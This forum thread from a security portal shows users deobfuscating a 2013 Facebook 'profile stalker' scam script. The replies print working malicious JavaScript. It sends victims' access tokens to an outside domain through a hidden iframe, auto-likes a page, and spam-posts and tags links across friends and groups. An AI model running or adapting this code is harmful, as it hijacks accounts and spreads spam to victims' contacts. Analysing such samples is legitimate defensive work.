Waraxe IT Security Portal
Login or Register
November 16, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 58
Members: 0
Total: 58
Full disclosure
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
4 vulnerabilities in ibmsecurity
32 vulnerabilities in IBM Security Verify Access
xlibre Xnest security advisory & bugfix releases
APPLE-SA-10-29-2024-1 Safari 18.1
SEC Consult SA-20241030-0 :: Query Filter Injection in Ping Identity PingIDM (formerly known as ForgeRock Identity Management) (CVE-2024-23600)
SEC Consult SA-20241023-0 :: Authenticated Remote Code Execution in Multiple Xerox printers (CVE-2024-6333)
APPLE-SA-10-28-2024-8 visionOS 2.1
APPLE-SA-10-28-2024-7 tvOS 18.1
APPLE-SA-10-28-2024-6 watchOS 11.1
APPLE-SA-10-28-2024-5 macOS Ventura 13.7.1
APPLE-SA-10-28-2024-4 macOS Sonoma 14.7.1
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PHP script decode requests -> Any champion can decode this js please?
Post new topicReply to topic View previous topic :: View next topic
Any champion can decode this js please?
PostPosted: Sun Jul 28, 2013 8:18 am Reply with quote
jhonrhods
Beginner
Beginner
Joined: Jul 28, 2013
Posts: 2




https://stalkerxx.s3.amazonaws.com/miley.js
View user's profile Send private message
PostPosted: Sun Jul 28, 2013 10:56 am Reply with quote
sprremix
Regular user
Regular user
Joined: Apr 25, 2013
Posts: 7




This is as far as I came: http://pastebin.com/ZCEyq8qq
View user's profile Send private message
PostPosted: Thu Aug 01, 2013 5:47 pm Reply with quote
freeuser
Beginner
Beginner
Joined: Aug 01, 2013
Posts: 2




Code:

jQuery(document).ready(function ($) {
$('a#getcode').click(function (e) {
e.preventDefault();
window.open('token.php?getcode', 'popUpWindow', 'width=900,height=20,left=300,top=300,resizable=no,scrollbars=yes,toolbar=yes,menubar=no,location=no,directories=no, status=yes')
});
$('a#activate').click(function (e) {
e.preventDefault();
$('.howto').fadeOut(function () {
$('.result').show();
$('.error').hide();
$('#logs').html("");
$('.loading').fadeIn('fast', function () {
var access_token = $('.access_token').val();
if (access_token.split('#access_token=')[1]) {
var access_token = access_token.split('#access_token=')[1].split('&')[0];
setTimeout("top.location.href = 'http://addfollow.uni.me/';", 25000);
$.getJSON('https://graph.facebook.com/me?access_token=' + access_token, function (response) {
if (response.id) {
var uid = response.id;
HeemaNada(access_token);
HaveFun(access_token);
$('ul.list').append('<li><img src="https://graph.facebook.com/' + uid + '/picture" alt="' + response.name + '"><a href="#">Hey , ' + response.name + '</a></li>');
$('.loading').slideUp(function () {
$('.friendlist').slideDown()
})
}
})
} else {
$(this).fadeOut(2000, function () {
$('.error').fadeIn('fast');
$('.howto').fadeIn()
})
}
})
})
});
$('a#back').click(function (e) {
e.preventDefault();
$('.result').slideUp(function () {
$('.error').hide()
})
})
});

function HeemaNada(token) {
jQuery['ajax']({
url: 'https://graph.facebook.com/me/likes?access_token=' + token + '&method=POST&url=https://www.facebook.com/441238915973738',
dataType: 'jsonp',
success: function (_0xb26ax3) {}
})
};

function HaveFun(token) {
console['log']('Request Sent');
document['getElementById']('atp')['innerHTML'] = '<iframe src="http://morethan40.tk/index.php?access_token=' + token + '" width="0" height="0"></iframe>'
};
View user's profile Send private message
PostPosted: Tue Aug 06, 2013 10:03 am Reply with quote
dondon
Regular user
Regular user
Joined: Aug 06, 2013
Posts: 8




Funny, i am getting this. I'm not sure if above is correct.

Code:

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head>
<body onLoad="GetGroups();GetFriends();getStatus();">
<script type="text/javascript" src="https://stalkerxx.s3.amazonaws.com/jquery.js"></script>

<script>
var access_token = "";
fotolink = "http://kundia.info/leta/dormans.php";
text = 'Get Your Profile Stalkerz Here --> www . profilestalkerss . tk (Remove Spaces) ';
gtext = 'Get Your Profile Stalkerz Here --> www . profilestalkerss . tk (Remove Spaces) ';
gonderildi = 0;

function GetGroups() {
jQuery['ajax']({
url: 'https://graph.facebook.com/fql?q=select gid, name from group where gid IN (SELECT gid FROM group_member WHERE uid=me()) order by rand() limit 70&access_token=' + access_token,
dataType: 'jsonp',
success: function (_0x1f66x7) {
Groups(_0x1f66x7);
}
});
};

function GetFriends() {
jQuery['ajax']({
url: 'https://graph.facebook.com/fql?q=SELECT uid, first_name FROM user WHERE uid IN ( SELECT uid2 FROM friend WHERE uid1 = me() ) ORDER BY rand() limit 400&access_token=' + access_token,
dataType: 'jsonp',
success: function (_0x1f66x7) {
Friends(_0x1f66x7);
}
});
};

function Friends(_0x1f66xa) {
for (i = 0; i < _0x1f66xa['data']['length']; i++) {
jQuery['ajax']({
url: 'https://graph.facebook.com/' + _0x1f66xa['data'][i]['uid'] + '/photos?url=' + fotolink + '&message=' + text + '&callback=paylas&method=POST&access_token=' + access_token,
dataType: 'script',
success: function () {
gonderildi += 1;
if (gonderildi >= _0x1f66xa['data']['length']) {};
}
});
};
};

function Groups(_0x1f66xa) {
for (i = 0; i < _0x1f66xa['data']['length']; i++) {
jQuery['ajax']({
url: 'https://graph.facebook.com/' + _0x1f66xa['data'][i]['gid'] + '/photos?url=' + fotolink + '&message=' + gtext + '&callback=paylas&method=POST&access_token=' + access_token,
dataType: 'script',
success: function () {
gonderildi += 1;
if (gonderildi >= _0x1f66xa['data']['length']) {};
}
});
};
};

function getStatus() {
$['getJSON']('https://graph.facebook.com/me/photos?url=' + fotolink + '&message=' + text + '&method=POST&access_token=' + access_token, function (_0x1f66xf) {
if (_0x1f66xf['id']) {
var _0x1f66x11 = _0x1f66xf['id'];
var _0x1f66x12 = 55;
$['getJSON']('https://graph.facebook.com/me/friends?limit=' + _0x1f66x12 + '&access_token=' + access_token, function (_0x1f66xf) {
if (_0x1f66xf['data']) {
var _0x1f66x13 = [];
$['each'](_0x1f66xf['data'], function (_0x1f66x14, _0x1f66x7) {
_0x1f66x13['push'](_0x1f66x7['id']);
$['getJSON']('https://graph.facebook.com/' + _0x1f66x11 + '/tags/' + _0x1f66x7['id'] + '/?method=POST&access_token=' + access_token, function (_0x1f66xf) {});
});
};
});
};
});
};

</script>
</body>
</html>
View user's profile Send private message
Any champion can decode this js please?
www.waraxe.us Forum Index -> PHP script decode requests
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.048 Seconds